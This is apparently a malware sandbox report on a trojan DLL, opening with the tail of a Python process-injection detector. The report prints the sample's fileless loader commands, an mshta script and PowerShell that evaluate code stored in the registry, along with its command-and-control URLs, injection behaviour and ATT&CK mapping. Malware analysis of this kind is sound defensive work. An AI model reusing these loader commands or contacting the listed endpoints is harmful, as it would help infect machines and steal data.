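    payload_writes: int = 0                              # writes into memory this source allocated
    other_writes: int = 0                                # low-address writes with no allocation seen
    patched_code: dict = field(default_factory=dict)     # addr -> first bytes written there, in order
    reprotects: list = field(default_factory=list)       # (addr, new protection)
    threads: list = field(default_factory=list)          # (operation, start address or None)

    def verdict(self):
        tags = []
        ran = bool(self.threads)
        if self.rwx_allocs and self.payload_writes:
            tags.append("remote RWX allocation filled" +
                        (" and executed (process injection)" if ran else " (staged, no execution seen)"))
        elif self.other_writes and ran:
            tags.append("writes into target without an observed allocation, then execution")
        for addr, written in self.patched_code.items():
            if any(start == addr for _, start in self.threads):
                tags.append(f"thread started at patched code 0x{addr:X} (inline patch used as entry point)")
            if len(written) >= 2 and written[0] != written[-1]:
                tags.append(f"patch at 0x{addr:X} restored (0x{written[0]:02X} -> 0x{written[-1]:02X})")
        if any(op == "set_thread_context" for op, _ in self.threads):
            tags.append("thread context rewritten in target (thread hijack)")
        return tags


def correlate(trace):
    """Group cross-process memory operations by (source, target) and classify each pair."""
    chains = {}
    for src, op, dst, d in trace:
        c = chains.setdefault((src, dst), Chain(src, dst))
        if op == "alloc":
            if "EXECUTE" in d.get("protect", ""):
                c.rwx_allocs.append(d["base"])
        elif op == "write":
            base = d["base"]
            if base in c.rwx_allocs:
                c.payload_writes += 1
            elif base >= HIGH_IMAGE_RANGE:
                c.patched_code.setdefault(base, [])
                if "first_byte" in d:
                    c.patched_code[base].append(d["first_byte"])
            else:
                c.other_writes += 1
        elif op == "protect":
            c.reprotects.append((d["base"], d["protect"]))
        elif op in ("set_thread_context", "create_thread"):
            c.threads.append((op, d.get("start")))
    return chains


if __name__ == "__main__":
    for (src, dst), chain in correlate(SAMPLE_TRACE).items():
        print(f"{src} -> {dst}")
        for tag in chain.verdict():
            print("   ", tag)
```

Keying on the pair rather than on single API calls is what separates this pattern from benign cross-process writes: a lone WriteProcessMemory is common, but an RWX allocation, a payload write, a byte patched into existing code, a thread started exactly there, and the byte put back afterwards, all from one source into one target, is not.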
                      Source: unknown | Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe" "about:<hta:application><script>Jqlc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Jqlc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\54E80703-A337-A6B8-CDC8-873A517CAB0E\\\TestLocal'));if(!window.flag)close()</script>
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn)) (2 occurrences)
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\xaj0e933Uv.dll",#1
                      Source: C:\Windows\SysWOW64\rundll32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
                      Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name axgpbo -value gp; new-alias -name slctai -value iex; slctai ([System.Text.Encoding]::ASCII.GetString((axgpbo "HKCU:Software\AppDataLow\Software\Microsoft\54E80703-A337-A6B8-CDC8-873A517CAB0E").UrlsReturn))
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m5pod5s5\m5pod5s5.cmdline
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\a1gxko15\a1gxko15.cmdline
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5F15.tmp" "c:\Users\user\AppData\Local\Temp\m5pod5s5\CSCDE04DA8616441A6AC3074D39CFFC1D3.TMP"
                      Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES73F5.tmp" "c:\Users\user\AppData\Local\Temp\a1gxko15\CSCE08F5B5052974B07835021DDCFF1297.TMP"
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost -n 5
                      Source: explorer.exe, 0000001D.00000000.434255940.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.434267332.0000000005E60000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455054907.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001D.00000000.424853777.00000000005C8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program Manager,
                      Source: explorer.exe, 0000001D.00000000.425378070.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455231831.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000001D.00000000.455646233.0000000000B50000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03433365 cpuid
                      Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034881F1 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_034341FA HeapFree,GetSystemTimeAsFileTime,HeapFree,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03436D78 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 2_2_03433365 RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                      Stealing of Sensitive Information

                      Source: Yara match | File source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      Source: Yara match | File source: 00000002.00000003.297325888.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297834584.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297429352.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297681439.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343681335.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297590765.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.344393693.00000000053EC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297638770.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297792500.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.342664941.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.297847872.00000000055E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: rundll32.exe PID: 5132, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 6644, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: control.exe PID: 4084, type: MEMORYSTR
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.5596b40.1.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.2.rundll32.exe.3430000.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.50494a0.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.55694a0.2.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 2.3.rundll32.exe.54ea4a0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000002.464317231.000000000526F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343634422.0000000005569000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.461814934.0000000005049000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.414668534.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.413947295.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000002.463561740.0000000003470000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000002.00000003.343553499.00000000054EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000019.00000000.415531783.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                      MITRE ATT&CK matrix columns: Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
                      1
                      Valid Accounts
                      1
                      Windows Management Instrumentation
                      1
                      Valid Accounts
                      1
                      Valid Accounts
                      1
                      Obfuscated Files or Information
                      1
                      Input Capture
                      1
                      System Time Discovery
                      Remote Services11
                      Archive Collected Data
                      Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts3
                      Native API
                      Boot or Logon Initialization Scripts1
                      Access Token Manipulation
                      1
                      File Deletion
                      LSASS Memory1
                      Account Discovery
                      Remote Desktop Protocol1
                      Email Collection
                      Exfiltration Over Bluetooth2
                      Encrypted Channel
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter
                      Logon Script (Windows)813
                      Process Injection
                      1
                      Masquerading
                      Security Account Manager3
                      File and Directory Discovery
                      SMB/Windows Admin Shares1
                      Input Capture
                      Automated Exfiltration1
                      Non-Application Layer Protocol
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                      Valid Accounts
                      NTDS25
                      System Information Discovery
                      Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Access Token Manipulation
                      LSA Secrets1
                      Query Registry
                      SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common31
                      Virtualization/Sandbox Evasion
                      Cached Domain Credentials11
                      Security Software Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items813
                      Process Injection
                      DCSync31
                      Virtualization/Sandbox Evasion
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
                      Rundll32
                      Proc Filesystem3
                      Process Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery
                      Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery
                      Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery
                      Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery
                      Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      Behavior Graph ID: 620332 | Sample: xaj0e933Uv.dll | Start date: 04/05/2022 | Architecture: WINDOWS | Score: 100
                      Start node (2): Snort IDS alert for network traffic; Found malware configuration; Multi AV Scanner detection for submitted file; 2 other signatures
                      • loaddll32.exe (11): started by (2); started cmd.exe (15)
                      • mshta.exe (13): started by (2); started powershell.exe (17)
                      • cmd.exe (15): started rundll32.exe (20)
                      • powershell.exe (17): Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; Modifies the context of a thread in another process (thread injection); 2 other signatures; started csc.exe (24), csc.exe (27), conhost.exe (29)
                      • rundll32.exe (20): connects to 185.189.151.28 (ports 49769, 80), AS-SOFTPLUSCH, Switzerland; System process connects to network (likely due to code injection or exploit); Writes to foreign memory regions; Allocates memory in foreign processes; 3 other signatures; started control.exe (31)
                      • csc.exe (24): dropped C:\Users\user\AppData\Local\...\m5pod5s5.dll (PE32); started cvtres.exe (34)
                      • csc.exe (27): dropped C:\Users\user\AppData\Local\...\a1gxko15.dll (PE32); started cvtres.exe (36)
                      • control.exe (31): Changes memory attributes in foreign processes to executable or writable; Injects code into the Windows Explorer (explorer.exe); Writes to foreign memory regions; 4 other signatures; injected explorer.exe (38)
                      • explorer.exe (38, injected): Self deletion via cmd delete; Disables SPDY (HTTP compression, likely to perform web injects); started cmd.exe (41); injected RuntimeBroker.exe (44); started cmd.exe (46)
                      • cmd.exe (41): Uses ping.exe to sleep; Uses ping.exe to check the status of other devices and networks; started conhost.exe (48), PING.EXE (50)

                      Source | Detection | Scanner | Label | Link
                      xaj0e933Uv.dll | 40% | Virustotal | | Browse
                      xaj0e933Uv.dll | 48% | ReversingLabs | Win32.Trojan.Zenpak |
                      xaj0e933Uv.dll | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link | Download
                      2.2.rundll32.exe.3430000.0.unpack | 100% | Avira | HEUR/AGEN.1245293 | | Download File
                      Source | Detection | Scanner | Label | Link
                      l-0007.l-dc-msedge.net | 0% | Virustotal | | Browse
                      Source | Detection | Scanner | Label | Link
                      http://185.189.151.28/ | 0% | Avira URL Cloud | safe |
                      http://https://file://USER.ID%lu.exe/upd | 0% | Avira URL Cloud | safe |
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS | 0% | Avira URL Cloud | safe |
                      http://crl.osofts/Microt0 | 0% | URL Reputation | safe |
                      http://185.189.151.28/drew/1WYEBXmiF_2FMnySkI/AGFp1zkHl/1n_2BEbfMMGs7_2FFktP/VnEJxGiu_2BRheq2fuh/m_2 | 0% | Avira URL Cloud | safe |
                      http://constitution.org/usdeclar.txt | 0% | URL Reputation | safe |
                      http://crl.micro | 0% | URL Reputation | safe |
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk | 0% | Avira URL Cloud | safe |
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2 | 0% | Avira URL Cloud | safe |
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk | 0% | Avira URL Cloud | safe |
                      http://constitution.org/usdeclar.txtC: | 0% | URL Reputation | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      l-0007.l-dc-msedge.net | 13.107.43.16 | true | true | | unknown
                      Name | Malicious | Antivirus Detection | Reputation
                      http://185.189.151.28/drew/DI9hOfnq4sis3AGOPt/_2FSN_2BC/vQMmpDQPqFMgJd7cY2BM/bpPiaoMoE2NRqo_2F46/T_2F2moLttcApM2j8JSDhs/WTmAL93U1NjUV/LMXna7GA/0XrWXSOJuSDBIpGqh8yB0Uw/8wBvAy1ROY/CU6_2BgS3mg1oC_2F/fr7BBq_2FOIM/8zgmlDNHCEg/MQH_2B5kPaL7jc/fyWcKgX2hWtfe66c_2BLA/pYfH_2BKPQZE6m8n/dgy8gM_2BVyJKF1/06D2L7PXyZQ5x_2F0m/7pDuXDGuxyU/cHq.jlk | true | Avira URL Cloud: safe | unknown
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGSnuowiNkO/ip_2FJtr3_2FyC3y34/NWeB6KDbS/szu4WIEy31uBJrZBRkk7/BA3lZi_2FOvOpDSYS4s/rj2HYxhZ8zs8SSN1QxOHNt/a0noZ7RHbBD3e/0lyarAzU/kswi_2B_2Bji3xmfI9dMO1H/eF7wdYyOYS/J0KjUNI3Yrq9HIDIZ/2ePpl9Tr16LA/Mto8yX4U3i1XH7H/1gu.jlk | true | Avira URL Cloud: safe | unknown
                      Name | Source | Malicious | Antivirus Detection | Reputation
                      http://185.189.151.28/ | rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://https://file://USER.ID%lu.exe/upd | rundll32.exe, 00000002.00000003.397268016.0000000006168000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000003.415812093.000001E636EFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416371744.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000019.00000003.416255152.0000020A9F33C000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | low
                      http://185.189.151.28/drew/yaLRzubGjQS/CFxKDeNAAfhLlC/CaygnSUs24bnRCfVOMlKd/kOu58i9k96sMGpEh/2ImNOGS | rundll32.exe, 00000002.00000003.352335631.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343411047.0000000003337000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.463215948.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.343421322.0000000003345000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000002.462912016.00000000032EA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000002.00000003.352328086.0000000003338000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
                      http://crl.osofts/Microt0 | powershell.exe, 00000012.00000003.560046822.000001E63635E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
